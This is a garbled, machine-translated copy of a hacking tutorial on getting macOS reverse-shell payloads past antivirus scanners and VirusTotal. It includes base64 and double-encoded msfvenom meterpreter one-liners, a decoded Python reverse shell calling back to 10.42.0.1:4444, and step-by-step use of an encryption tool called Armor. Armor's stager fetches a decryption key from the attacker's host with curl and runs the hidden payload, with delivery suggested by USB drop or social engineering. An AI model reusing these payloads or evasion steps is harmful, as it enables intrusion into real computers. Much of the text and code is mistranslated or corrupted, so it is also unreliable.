قالب وردپرس درنا توس
Home / Tips and Tricks / Creating an Undetectable Payload «null bytes :: WonderHowTo

Creating an Undetectable Payload «null bytes :: WonderHowTo



Encrypting payloads and encoding stacks is more effective than you think. It's also very easy to bypass VirusTotal and macOS antivirus software with a few simple tricks.

The goal of this project was to locate a known and easily recognizable macOS payload and then find a method that could perform exactly the same payload as the target MacBook. This would reliably confirm whether a detected bypass method was effective in performing known payloads. In addition to testing malicious files against VirusTotal, they were tested in MacOS Mojave (version 10.14) against common antivirus software such as Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers should not confuse this topic with bypass GateKeeper or System Integrity Protections (SIP). Running an unsigned application and evading virus scanners are two different topics. The focus of this article is on bypassing the detection of antivirus software and VirusTotal. As we'll see below, in most cases, it's enough to just encode a payload to bypass antivirus detection.

Base64 Encoding Basics

Encoding as an antivirus evasion method is (usually) a very horrible idea to easily decode and identify. However, coding of Python and Bash scripts is common in projects such as Empire and msfvenom. It allows coders to execute complex scripts without worrying about special characters that could cause a payload to become corrupted or fail.

Let's talk about the base64 encoding for a minute and look at the following strings.

  base64
b25lCg ==

Echo & # 39; one two & # 39; | base64
b25lIHR3bwo =

echo & # 39; one two three & # 39; | base64
b25lIHR3byB0aHJlZQo =

echo - one two three four & # 39; | base64
b25lIHR3byB0aHJlZSBmb3VyCg ==

echo - one two three four five & # 39; | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK 

All strings can be easily decoded with the following command ( -d in Kali, -D ). b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK & # 39;

Note that the end of the strings changes slightly, while the beginning always appears the same. The same is true for most msfvenom payloads. If only the IP address and port number are changed, the beginning of the generated Base64 encoded payloads will always be the same for each hacker and pentester using msfvenom. Below is an example of msfvenom with the IP address is created "1

0.42.0.1."

  aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo = 

The under msfvenom Edition uses the same payload, but with a different IP address "192.168.0.2".

  aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc + SScscy per day per day per day per day per day per day per month per day per day per day per month per day per month per month per day per month per day per month per day per month per day per month msfvenom payload. If it is not decoded and parsed for malicious code, it at least makes sense that antivirus software recognizes common base64 strings - but not. 

Single Base64 Encoded Payloads

Believe it or not and find a malicious file VirusTotal and Antivirus could find that was a challenge. After a quick search on the Internet for popular "hacking macOS" articles a three-year zero-byte article from community member psytech140 offered a simple msfvenom payload. Execution of the following command resulted in the following output:

  msfvenom -p python / meterpreter / reverse_tcp LHOST = 10.42.0.1 LPORT = 4444

[-] No platform was selected, with Msf :: Module :: Platform :: Python selected from the payload
[-] No arc selected, where arc: Python is selected from the payload
Payload size: 446 bytes
import Base64, sys; exec (base64.b64decode ({2: st, 3: lambda b: Byte (B & # 39; UTF-8 & # 39)} [sys.version_info[0]] (# 39; # 39 & aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo =;))) [19659008] This is a base64-encoded Python one-liners to interact with Metasploit. Storing the nickliner in a file named "thisfileisevil.py" and uploading to VirusTotal resulted in a detection rate of 4:58. 

This detection rate is surprisingly low. Decoding the embedded base64 string reveals that the Python script should connect to a remote server (10.42.0.1) on port 4444.

  base64 -d << < 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('> I & # 39 ;, s.recv (4)) [0]
d = s.recv (l)
while len (d) <l:
d + = s.recv (l-len (d))
exec (d, {& # 39; s & # 39; s}) 

Storing the above decoded Python code in a file named "thisfileisevil_without_encoding.py" and uploading to VirusTotal resulted in the following detection rates of 1 / 56th

Interestingly, the raw Python code received an even lower detection rate.

At this time, it is not clear what VirusTotal and antivirus software are trying to detect. They do no great work in decrypting Base64 strings or in tagging the 13 Mfvenom-generated Python lines that have been used by thousands of pent-up and hackers over the years.

Double Base64 Encoded Payloads

If a frequently encrypted payload can handle most antivirus software. Double encoding should also be an effective technique, right? Not quite. Encoding the encoded msfvenom output and uploading to VirusTotal resulted in the following 1/54 detection.

Again 1/54 detection by Microsoft, which does not support MacOS with antivirus software support. This was accomplished by first encoding the msfvenom output - the exact same msfvenom payload that was previously recognized.

  cat thisfileisevil.py | base64

aW1wb3J0IGJhc2U2NCxzeXM7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHsyOnN0ciwzOmxhbWJkYSBi
OmJ5dGVzKGIsJ1VURi04Jyl9W3N5cy52ZXJzaW9uX2luZm9bMF1dKCdhVzF3YjNKMElITnZZMnRs
ZEN4emRISjFZM1FzZEdsdFpRcG1iM0lnZUNCcGJpQnlZVzVuWlNneE1DazZDZ2wwY25rNkNna0pj
ejF6YjJOclpYUXVjMjlqYTJWMEtESXNjMjlqYTJWMExsTlBRMHRmVTFSU1JVRk5LUW9KQ1hNdVky
OXVibVZqZENnb0p6RXdMalF5TGpBdU1TY3NORFEwTkNrcENna0pZbkpsWVdzS0NXVjRZMlZ3ZERv
S0NRbDBhVzFsTG5Oc1pXVndLRFVwQ213OWMzUnlkV04wTG5WdWNHRmpheWduUGtrbkxITXVjbVZq
ZGlnMEtTbGJNRjBLWkQxekxuSmxZM1lvYkNrS2QyaHBiR1VnYkdWdUtHUXBQR3c2Q2dsa0t6MXpM
bkpsWTNZb2JDMXNaVzRvWkNrcENtVjRaV01vWkN4N0ozTW5Pbk45S1FvPScksach 

It can run on the target MacBook with the following command and base64 use the MacBook to decode ( -D ) the string and immediately execute the command ( -c ) with Python off, which in turn decrypts the inner payload and creates a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus software are bypassed this way. No single tested antivirus software was able to detect a double-encoded payload in the form of a text file or AppleScript code.

Encrypted Payloads

So far, we've learned that encryption and double-coding payloads bypass detection of most antivirus software (though using raw code is better). However, encoding scripts and payloads encourages a cat and mouse game between hackers and antivirus developers. It's only a matter of time before someone at AVG or Avast discovers this zero-byte article and antivirus scanners recursively begin decrypting Base64 strings and looking for commonly encrypted signatures.

This led me to think about a more reliable way to beat macOS Antivirus. a solution that is a bit harder to detect and prevent. The encryption of the user data offers, in addition to the encryption, a better solution for avoiding antivirus scanners.

Why is encryption better than coding?

The main disadvantage of coding is the ability of antivirus software to continuously decode Base64 strings and simply discover the embedded payload. No matter how many times an attacker encrypts his payload, he can be rebuilt. By encrypting the payload, anti-virus software eventually finds a string of unreadable data. The encrypted payload can not be scanned by AV software or read by humans - not without knowing the decryption key.

This brings me to Armor, a simple shell script I created to illustrate how to automate and execute the encryption of macOS payloads.

How the Armor script works

Armor encrypts the contents of every file it's received. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-usage script written in a macOS-supported programming language. The contents of the file are encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and downloaded from the target MacBook to decrypt the payload.

Below is an example of using Armor with a simple Netcat payload.

There are some things happening in this GIF. I explain each step in the order.

A netcat listener is starting on port 4444. The payload.txt file is read and contains a simple bash-one liner that, when executed, establishes a TCP connection between the target MacBook and the attacker's netcat listener. Armor is used to encrypt the Bash-One liner. Ncat is used to host the decryption key on the server of the attacker. When the stager is run on the destination MacBook (not shown in the GIF file), the Bash-One Liner is decrypted and executed without writing data to disk. Ncat stops the listener immediately after the key is used. When the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of the script's functions and how to execute commands without writing data to the hard drive of the target, see my GitHub page to view the comments. Readers interested in a quick test run by Armor can do the following:

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the following command.

  git clone https: //github.com/tokyoneon/Armor

Clone in "armor" ...
remote: enumeration of objects: 7, done.
Remote: Count objects: 100% (7/7), done.
Remote: Compressing objects: 100% (6/6), done.
Remote: Sum 7 (delta 0), reused 0 (delta 0), reused packet 0
Unpacking objects: 100% (7/7), done. 

Change ( cd ) to the newly created Armor / directory.

  cd Armor / 

Then enter the armor script permissions to run.

  chmod + x armor.sh 

Step 2: Create the Payload

In my example GIF, a Bash-One Liner is used to make a TCP connection Encrypt a trivial command ls .

Use the following command to create the payload.txt file.

  echo & ls; -la & # 39;> /tmp/payload.txt 

Step 3: Encrypt the payload with Armor

Now encrypt the contents of payload.txt with Armor, by using the following command:

  ./armor.sh /tmp/payload.txt 1.2.3.4 443

.., co8oc.oo8888cc, ..
o8o. .., o889689ooo888o "88888888oooc ..
.8888 .o88886888 ".88888888o & # 39; 888888888889ooo ....
a88p ..c688869 "" .., "o888888888o.?8888888888"".ooo8888oo.
088P .. atc8889 "", oo8o.86888888888o 88988889 ", o888888888888.
888t ... coo688889 "& # 39; ooo88o88b. & # 39; 86988988889 8688888 & oh8888896989 ^ 888o
888888888888 ".. ooo88896888888" 9o688888 "888988 8888868888 & # 88; o88888
"G8889" "ooo88888888888889 .d8o9889" "" 8688o. 88888988 o888888o.
o8888 "" "" "" "" "" o8688 "88868. 888888.68988888 o8o.
88888o. "8888ooo. & # 8888 .888888.8898888o" 888o ..
8888l & # 888888 & # 39; & # 39; & # 39; 8o 8888.8869888oo8888o
, , ;;;;;. , & # 39; ,,., ;; & # 39; ;;;;; :. "8888" 888888888 ^ 88o
OM0 xWl :: coK0. .WM, MW, KOlccxXd & # 39; Mk :: clkXc ..8888. "88,888,888,888th
.WXM. x W K 0 · WMK KMW Nk; M: & M: 1M:: o888.o8o. "866o9888o
lN.Xo xW OK .WKWc LWKW.Wd.Ml & # 39; M :; M: 888.8888. 88. 89.
0k dX xW OK .WXX. .NodW .Wd.Ml # M :; M, 89, 888888, "88":.
& # 39; M; & # 39; M, xW KO .Wo.No dX dW. Wd.Ml & # 39; M: oM. & # 39; 8888o
on Kx xW.cccoKO. .Where cWlW: dW .Wd.Ml & # 39; Mc; cclkXc "8888 ..
Xd ON. xW xWc & # 39 ;. Where KM0 dW .Wd .M # M :, WO #. 888888o.
; Mc ...: Mc xW 0K. .Where, W? DW .Wd.Ml & # 39; M: cW: "888889,
OXlllllKK xW .KO .Wo & dW; WD .Ml & # 39; M: oN & # 39 ;. ::. ::::. ::.
.Mo cM, xW .Xd .Wo dW .Wd .Ml & # 39; M: dX. created by @tokyoneon_
oW. .Wd xW? W: .Where dW XO: M; # M: 0O
KO xN x W: N, .Wo dW .O0xodO0c & M: .Xk

[+] Generated encryption key: /root/Armor/payload.txt_5c6c.key
[+] Encrypted payload: /root/Armor/payload.txt_5c6c.enc
[+] Generated SSL certificate: /root/Armor/payload.txt_5c6c.crt
[+] Generated SSL key: /root/Armor/payload.txt_5c6c_ssl.key
[+] Stager Stored: /root/Armor/payload.txt_5c6c_stager.txt

[!] Run in the destination MacBook:

bash -c "$ (bash -c" $ (printf #% s # YjAxMjMyZTU2ZTFhNDAxMDFlY2FlNjlkPi9kZXYvbnVsbCAyPiYxOyBvcGVuc3NsIGVuYyAtZCAt
YWVzLTI1Ni1jYmMgCS1pbiA8KHByaW50ZiAnJXMnICdVMkZzZEdWa1gxL29jU0tsUkdIRmZncmd1
YjlLV3JJdFlORldvNGplMzVFZTVXbTNUVytpWnA1RlVLc1o2NXBjdGt6bkdyK0gxUUo5eUtrYk8v
MXhTUT09JyB8IGJhc2U2NCAtRCkgCS1wYXNzIGZpbGU6PChjdXJsIC1zIC0taW5zZWN1cmUgaHR0
cHM6Ly8weDBBMkEwMDAxOjQ0Myk = & # 39; base64 -D) ")"; history -c

[!] Start the Ncat Listener now? y / N

[!] Start Ncat Listener: 

The address 1.2.3.4 is the IP address of the attacker to whom the decryption key is hosted. This can be a local IP address (for example "192.168.1.2") or a virtual private server address. The Ncat server uses this address and port number ( 443 ) to host the decryption key. Port 443 can be any available port in the attacker's Kali Linux system.

If LibreSSL (the version of OpenSSL used by macOS) is not found in Kali, Armor tries to install it. Unfortunately, the version of OpenSSL found in Kali / Debian is not compatible with MacOS & # 39; LibreSSL.

Step 4: Starting the Ncat Listener

Before running the stager, start the Ncat Listener. Armor will try to start it automatically.

  [+] Ncat active for Stager: payload.txt_e856 ...
Ncat: Version 7.70 (https://nmap.org/ncat)
Ncat: Stop Listening ::: 443
Ncat: Listening to 0.0.0.0:443[196590554Step5:ExecutetheStager

Armor generates an encrypted and encoded command intended for the target MacBook. This stager can be embedded in an AppleScript for USB drop attacks, used for USB Rubber Ducky attacks, or possibly for other social engineering attacks. For now, we're copying the stager into a MacBook terminal.

When the stager is run, the MacBook terminal ( ls ) lists all ( -a .) Files in the current directory in the long ( -l ) Format.

We encoded a simple ls ls . However, imagine using the same level of obfuscation on a sophisticated Python script that is supposed to perform a variety of advanced attacks. Anti-virus software currently does not decode Base64 strings - and even if they could, the embedded and encrypted payload data could not be read.

Improvement of Attack

Armor is not perfect. It's a certain proof-of-concept that hopefully readers will find room for improvement. An alternative to LibreSSL, for example, since most Debian and Kali distributions are not installed by default, this is somewhat uncomfortable as an encryption solution.

Hosting the decryption key on the server of the attacker is dangerous. If the IP address of the attacker is detected in the stager, it may be possible to list the file name of the key and download it. The key would allow the goal to rebuild the encrypted payload and learn what kind of exploit was done on the MacBook.

Using UDP on port 53 to transmit the decryption key would more likely prevent firewall detection, and Deep Packet Inspection (DPI) makes it all the more "unrecognizable".

In addition, finding a way to encrypt user data that does not depend on whether the destination is connected to the Internet (to download the decryption key) would be efficient.

Final Thoughts

After testing these attacks against VirusToal and at least six popular antivirus software, no double-encoded payload could be detected. It seems that macOS antivirus scanners are almost unaware even of the most common single-encoded payloads. Discovering something made with Armor turns out to be much more difficult for today's macOS antivirus scanners.

In addition, macOS relies on GateKeeper to prevent malicious applications from being opened. As shown in a previous article, GateKeeper protections are not applied to USB drives inserted into the MacBook, so targets for opening malicious files at the social level can be developed.

To proactively prevent such attacks, readers should call the "How to protect yourself" option from macOS Attacks.

Do not miss: How to hack Mojave with a self-destructive payload

Title image and screenshots of tokyoneon / Null Byte

Source link